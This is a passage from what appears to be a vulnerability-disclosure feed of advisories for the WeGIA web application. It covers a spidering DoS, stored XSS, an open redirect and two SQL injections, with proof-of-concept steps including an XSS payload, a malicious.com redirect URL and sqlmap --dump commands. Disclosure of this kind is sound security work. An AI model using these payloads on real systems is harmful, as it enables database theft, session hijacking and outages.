>https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 03 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-27419/ https://www.cvehunters.com/p/cve-2025-27419/ <h2 id="cve-2025-27419-denial-of-service-dos-in-wegia-due-to-recursive-crawling-of-dynamic-urls">CVE-2025-27419: Denial of Service (DoS) in WeGIA due to Recursive Crawling of Dynamic URLs </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27419" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27419</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Denial of Service (DoS) vulnerability exists in WeGIA. This vulnerability allows any unauthenticated user to cause the server to become unresponsive by performing aggressive spidering using tools like OWASP ZAP. The vulnerability is caused by recursive crawling of dynamically generated URLs and insufficient handling of large volumes of requests.</p><h2 id="cve-2025-27419-denial-of-service-dos-in-wegia-due-to-recursive-crawling-of-dynamic-urls">CVE-2025-27419: Denial of Service (DoS) in WeGIA due to Recursive Crawling of Dynamic URLs </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27419" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27419</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Denial of Service (DoS) vulnerability exists in WeGIA. This vulnerability allows any unauthenticated user to cause the server to become unresponsive by performing aggressive spidering using tools like OWASP ZAP. The vulnerability is caused by recursive crawling of dynamically generated URLs and insufficient handling of large volumes of requests.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The issue occurs when the OWASP ZAP Spider scans the application and recursively crawls URLs with dynamic parameters. The Spider generates an excessive number of requests due to: <ul> <li>The presence of parameters like <code>?C=M;O=D</code> that create multiple unique URLs.</li> <li>Access to directories exposing static files, such as <code>bower_components</code> and related assets.</li> <li>No rate limiting or restrictions on dynamically generated URLs at the server level.</li> </ul> </p> <p style="text-align: justify;">The problem is exacerbated by: <ul> <li>Unlimited depth crawling by the Spider.</li> <li>Recursive exploration of similar URLs with slight variations.</li> <li>Overwhelming the server with a high frequency of requests, which eventually causes it to stop responding.</li> </ul> </p> <p><img src="/p/cve-2025-27419/404406419-75ee7c49-def1-4f43-ad61-9f14daab8cbd.png" width="934" height="715" srcset="/p/cve-2025-27419/404406419-75ee7c49-def1-4f43-ad61-9f14daab8cbd_hu_7a60622cfcff99fb.png 480w, /p/cve-2025-27419/404406419-75ee7c49-def1-4f43-ad61-9f14daab8cbd_hu_31e211c362e52625.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="130" data-flex-basis="313px" /></p> <p><img src="/p/cve-2025-27419/404406433-c926fb6d-e33b-4555-9b8d-3a3fc66a20f7.png" width="911" height="706" srcset="/p/cve-2025-27419/404406433-c926fb6d-e33b-4555-9b8d-3a3fc66a20f7_hu_372c821c0b296966.png 480w, /p/cve-2025-27419/404406433-c926fb6d-e33b-4555-9b8d-3a3fc66a20f7_hu_e222b1ff2fb990ec.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="129" data-flex-basis="309px" /></p> <p style="text-align: justify;">This behavior was observed in multiple tests, consistently resulting in server downtime.</p> <h2 id="poc">POC </h2><p style="text-align: justify;">Steps to reproduce the issue: <ol type="1"> <li>Install OWASP ZAP (version 2.15.0 or higher).</li> <li>Set the Spider configuration as follows:</li> <ul> <li>Starting Point: <code>https://comfirewall.wegia.org:8000/</code></li> <li>Recurse: Enabled.</li> <li>Maximum Depth to Crawl: Unlimited (default: 0).</li> <li>Process Forms: Enabled.</li> </ul> <li>Start the Spider and monitor the server behavior.</li> <li>After a few seconds:</li> <ul> <li>The server becomes unresponsive or starts returning HTTP 5xx errors.</li> <li>Logs show repeated requests to resources like <code>bower_components/ckeditor/plugins</code> and dynamic URLs with parameters.</li> </ul> </ol> </p> <p><img src="/p/cve-2025-27419/404406517-71f7f8e9-6b38-4632-99af-b58000820624.png" width="1920" height="599" srcset="/p/cve-2025-27419/404406517-71f7f8e9-6b38-4632-99af-b58000820624_hu_432aae02073c59a.png 480w, /p/cve-2025-27419/404406517-71f7f8e9-6b38-4632-99af-b58000820624_hu_fa07848ed6814990.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="320" data-flex-basis="769px" /></p> <video width="100%" height="100%" controls> <source src="404407716-dcac56f8-3531-4769-9c50-8598a3fb2a94.mp4" type="video/mp4"> </video> <h2 id="affected-urls">Affected URLs </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">https://comfirewall.wegia.org:8000/WeGIA/html/socio/sistema/controller/bower_components/ckeditor/plugins/balloonpanel/skins/moono-lisa/images/hidpi/?C=M;O=D </span></span><span class="line"><span class="cl">https://comfirewall.wegia.org:8000/WeGIA/html/socio/sistema/controller/bower_components/select2/src/js/select2/data/?C=M;O=D </span></span></code></pre></td></tr></table> </div> </div><h2 id="impact">Impact </h2><p style="text-align: justify;">This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.</p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9rp6-4mqp-g4p8" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9rp6-4mqp-g4p8</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/srafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/sdiego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/snatan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 03 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-27420/ https://www.cvehunters.com/p/cve-2025-27420/ <h2 id="cve-2025-27420-cross-site-scripting-xss-stored-endpoint-atendido_parentesco_adicionarphp-parameter-descricao">CVE-2025-27420: Cross-Site Scripting (XSS) Stored endpoint <code>atendido_parentesco_adicionar.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27420" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27420</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>atendido_parentesco_adicionar.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /atendido/atendido_parentesco_adicionar.php</code></p><h2 id="cve-2025-27420-cross-site-scripting-xss-stored-endpoint-atendido_parentesco_adicionarphp-parameter-descricao">CVE-2025-27420: Cross-Site Scripting (XSS) Stored endpoint <code>atendido_parentesco_adicionar.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27420" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27420</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>atendido_parentesco_adicionar.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /atendido/atendido_parentesco_adicionar.php</code></p> <p>Parameter: <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>atendido_parentesco_adicionar.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">top</span><span class="p">[</span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">30</span><span class="p">)](</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-27420/402953284-4f1da611-9de5-417a-9abd-002eec95ac33.png" width="936" height="399" srcset="/p/cve-2025-27420/402953284-4f1da611-9de5-417a-9abd-002eec95ac33_hu_f257ec34f7fabe3a.png 480w, /p/cve-2025-27420/402953284-4f1da611-9de5-417a-9abd-002eec95ac33_hu_e80b786271787925.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="563px" /></p> <p><img src="/p/cve-2025-27420/402953315-664f0c8f-e1c9-4433-91c8-ea43bd485b08.png" width="1359" height="288" srcset="/p/cve-2025-27420/402953315-664f0c8f-e1c9-4433-91c8-ea43bd485b08_hu_f79aba4239919c00.png 480w, /p/cve-2025-27420/402953315-664f0c8f-e1c9-4433-91c8-ea43bd485b08_hu_906450cb81c80b4f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="471" data-flex-basis="1132px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x3wr-75qx-55cw" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 03 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-24020/ https://www.cvehunters.com/p/cve-2025-24020/ <h2 id="cve-2025-24020-url-redirection-to-untrusted-site-open-redirect-in-wegia">CVE-2025-24020: URL Redirection to Untrusted Site (<code>Open Redirect</code>) in WeGIA </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-24020" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-24020</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An Open Redirect vulnerability was identified in the <code>control.php</code> endpoint of the Wegia application. The vulnerability allows the <code>nextPage</code> parameter to be manipulated, redirecting authenticated users to arbitrary external URLs without validation. Unauthenticated users will see the message: <strong>"Operação negada: Cliente não autorizado"</strong>.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The issue stems from the lack of validation for the <code>nextPage</code> parameter, which accepts external URLs as redirection destinations. This vulnerability can be exploited to perform phishing attacks or redirect users to malicious websites.</p><h2 id="cve-2025-24020-url-redirection-to-untrusted-site-open-redirect-in-wegia">CVE-2025-24020: URL Redirection to Untrusted Site (<code>Open Redirect</code>) in WeGIA </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-24020" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-24020</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An Open Redirect vulnerability was identified in the <code>control.php</code> endpoint of the Wegia application. The vulnerability allows the <code>nextPage</code> parameter to be manipulated, redirecting authenticated users to arbitrary external URLs without validation. Unauthenticated users will see the message: <strong>"Operação negada: Cliente não autorizado"</strong>.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The issue stems from the lack of validation for the <code>nextPage</code> parameter, which accepts external URLs as redirection destinations. This vulnerability can be exploited to perform phishing attacks or redirect users to malicious websites.</p> <p>Vulnerable Endpoint: <code>https://comfirewall.wegia.org:8000/WeGIA/controle/control.php</code></p> <p>Parameter: <code>nextPage</code></p> <h2 id="poc">POC </h2><p style="text-align: justify;"> <ol type="1"> <li>Log in to the application.</li> <li>Access the following URL: <code>https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=FuncionarioControle&nextPage=https://malicious.com</code>.</li> <li>The authenticated user will be redirected to <code>https://malicious.com</code>.</li> </ol> </p> <video width="100%" height="100%" controls> <source src="403920253-29492e5a-3047-4c82-965c-02ffdcf8d649.mp4" type="video/mp4"> </video> <h2 id="impact">Impact </h2><p style="text-align: justify;"> This vulnerability allows: <ul> <li>Phishing: Attackers can redirect authenticated users to fake login pages.</li> <li>Malware Distribution: Users can be directed to sites hosting malicious content.</li> <li>Reputation Damage: The trust in the Wegia domain can be harmed.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-27g8-5q48-xmw6" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-27g8-5q48-xmw6</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Tue, 21 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23218/ https://www.cvehunters.com/p/cve-2025-23218/ <h2 id="cve-2025-23218-sql-injection-endpoint-adicionar_especiephp-parameter-especie">CVE-2025-23218: SQL Injection endpoint <code>adicionar_especie.php</code> parameter <code>especie</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23218" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23218</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>adicionar_especie.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_especie.php</code></p><h2 id="cve-2025-23218-sql-injection-endpoint-adicionar_especiephp-parameter-especie">CVE-2025-23218: SQL Injection endpoint <code>adicionar_especie.php</code> parameter <code>especie</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23218" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23218</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>adicionar_especie.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_especie.php</code></p> <p>Parameter: <code>especie</code></p> <p style="text-align: justify;">The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.</p> <h2 id="poc">POC </h2><h3 id="payload-sqlmap">Payload (sqlmap): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -u "http://localhost/dao/pet/adicionar_especie.php" --data="especie=especie" --dbms=mysql --cookie="PHPSESSID=thaicee00su2lhvlceu9r9v66v" --dump </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23218/403844925-6e106f6c-698d-4276-b7dd-3df222176ed6.png" width="1344" height="249" srcset="/p/cve-2025-23218/403844925-6e106f6c-698d-4276-b7dd-3df222176ed6_hu_de0174550aa0f97a.png 480w, /p/cve-2025-23218/403844925-6e106f6c-698d-4276-b7dd-3df222176ed6_hu_d6ee4a7d605c9ed5.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="539" data-flex-basis="1295px" /></p> <p style="text-align: justify;">It was possible to identify the database <code>wegia</code>.</p> <p><img src="/p/cve-2025-23218/403844621-a496e1e3-488f-4d2d-a9d3-be3adfaacde3.png" width="1343" height="218" srcset="/p/cve-2025-23218/403844621-a496e1e3-488f-4d2d-a9d3-be3adfaacde3_hu_d34b18344e26745c.png 480w, /p/cve-2025-23218/403844621-a496e1e3-488f-4d2d-a9d3-be3adfaacde3_hu_5b51c5d48c95e4da.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="616" data-flex-basis="1478px" /></p> <p style="text-align: justify;">It was possible to fully dump the <code>pessoa</code> table.</p> <p><img src="/p/cve-2025-23218/403869737-a1092b56-7ae3-40aa-966e-902b6da920e7.png" width="1347" height="126" srcset="/p/cve-2025-23218/403869737-a1092b56-7ae3-40aa-966e-902b6da920e7_hu_44347e579bef36ca.png 480w, /p/cve-2025-23218/403869737-a1092b56-7ae3-40aa-966e-902b6da920e7_hu_6833eead79fc2641.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="1069" data-flex-basis="2565px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.</li> <li>Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.</li> <li>Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.</li> <li>Reputational damage: Exposing customer data or business information can significantly harm the organization's image.</li> <li>Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xhv4-88gx-hvgh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xhv4-88gx-hvgh</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 20 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23219/ https://www.cvehunters.com/p/cve-2025-23219/ <h2 id="cve-2025-23219-sql-injection-endpoint-adicionar_corphp-parameter-cor">CVE-2025-23219: SQL Injection endpoint <code>adicionar_cor.php</code> parameter <code>cor</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23219" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23219</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>adicionar_cor.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_cor.php</code></p><h2 id="cve-2025-23219-sql-injection-endpoint-adicionar_corphp-parameter-cor">CVE-2025-23219: SQL Injection endpoint <code>adicionar_cor.php</code> parameter <code>cor</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23219" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23219</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>adicionar_cor.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_cor.php</code></p> <p>Parameter: <code>cor</code></p> <p style="text-align: justify;">The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.</p> <h2 id="poc">POC </h2><h3 id="payload-sqlmap">Payload (sqlmap): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -u "http://localhost/dao/pet/adicionar_cor.php" --data="cor=cor" --dbms=mysql --cookie="PHPSESSID=thaicee00su2lhvlceu9r9v66v" --dump </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23219/403877746-114d9e46-ec6d-4477-bc87-b2bfe516a53d.png" width="1342" height="180" srcset="/p/cve-2025-23219/403877746-114d9e46-ec6d-4477-bc87-b2bfe516a53d_hu_1d87c0dd14172da3.png 480w, /p/cve-2025-23219/403877746-114d9e46-ec6d-4477-bc87-b2bfe516a53d_hu_b29a8dbb14be12a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="745" data-flex-basis="1789px" /></p> <p style="text-align: justify;">It was possible to identify the database <code>wegia</code>.</p> <p><img src="/p/cve-2025-23219/403877561-4055ecb6-99d2-4a77-b921-943b672ea673.png" width="1343" height="218" srcset="/p/cve-2025-23219/403877561-4055ecb6-99d2-4a77-b921-943b672ea673_hu_d34b18344e26745c.png 480w, /p/cve-2025-23219/403877561-4055ecb6-99d2-4a77-b921-943b672ea673_hu_5b51c5d48c95e4da.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="616" data-flex-basis="1478px" /></p> <p style="text-align: justify;">It was possible to fully dump the <code>pessoa</code> table.</p> <p><img src="/p/cve-2025-23219/403877916-a91ad1ea-7d42-4665-a275-c018dc1de239.png" width="1347" height="126" srcset="/p/cve-2025-23219/403877916-a91ad1ea-7d42-4665-a275-c018dc1de239_hu_44347e579bef36ca.png 480w, /p/cve-2025-23219/403877916-a91ad1ea-7d42-4665-a275-c018dc1de239_hu_6833eead79fc2641.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="1069" data-flex-basis="2565px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.</li> <li>Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.</li> <li>Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.</li> <li>Reputational damage: Exposing 